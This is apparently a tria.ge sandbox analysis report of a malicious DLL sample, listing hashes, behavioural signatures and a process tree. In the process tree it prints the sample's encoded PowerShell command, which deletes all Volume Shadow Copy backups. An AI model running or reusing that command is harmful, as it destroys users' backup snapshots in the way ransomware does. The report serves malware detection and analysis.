Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
09/05/2024, 04:58
Static task
static1
Behavioral task
behavioral1
Sample
2865ed46578bf51a1656064c7375b94d_JaffaCakes118.dll
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
2865ed46578bf51a1656064c7375b94d_JaffaCakes118.dll
Resource
win10v2004-20240426-en
General
-
Target
2865ed46578bf51a1656064c7375b94d_JaffaCakes118.dll
-
Size
166KB
-
MD5
2865ed46578bf51a1656064c7375b94d
-
SHA1
fef692d2dcfc799b7399d88372fc5470c1ffc8b2
-
SHA256
ba11d5592a54787bae50a01afa3cef0f57b67ac4ba603525abb56d3260a5b6ce
-
SHA512
6b491507bcbe7259f59c3a1079e9bc02febe007e30a448bec1c1f4bd9e1ca4b646175c46eef83df3c4e084049b9228390674e6dcae737cc2bca7a3c70d6b3728
-
SSDEEP
3072:MJMawtnGqtWoKeZ9fh1CgnNto6jfmVvdOyY26bL:Ww9vteqJggn7oUfodOTL
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\X: rundll32.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2196 rundll32.exe 2308 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2196 rundll32.exe Token: SeDebugPrivilege 2308 powershell.exe Token: SeBackupPrivilege 2908 vssvc.exe Token: SeRestorePrivilege 2908 vssvc.exe Token: SeAuditPrivilege 2908 vssvc.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2188 wrote to memory of 2196 2188 rundll32.exe 28 PID 2188 wrote to memory of 2196 2188 rundll32.exe 28 PID 2188 wrote to memory of 2196 2188 rundll32.exe 28 PID 2188 wrote to memory of 2196 2188 rundll32.exe 28 PID 2188 wrote to memory of 2196 2188 rundll32.exe 28 PID 2188 wrote to memory of 2196 2188 rundll32.exe 28 PID 2188 wrote to memory of 2196 2188 rundll32.exe 28 PID 2196 wrote to memory of 2308 2196 rundll32.exe 29 PID 2196 wrote to memory of 2308 2196 rundll32.exe 29 PID 2196 wrote to memory of 2308 2196 rundll32.exe 29 PID 2196 wrote to memory of 2308 2196 rundll32.exe 29 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\2865ed46578bf51a1656064c7375b94d_JaffaCakes118.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\2865ed46578bf51a1656064c7375b94d_JaffaCakes118.dll,#12⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2196 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2308
-
-
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2332
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2908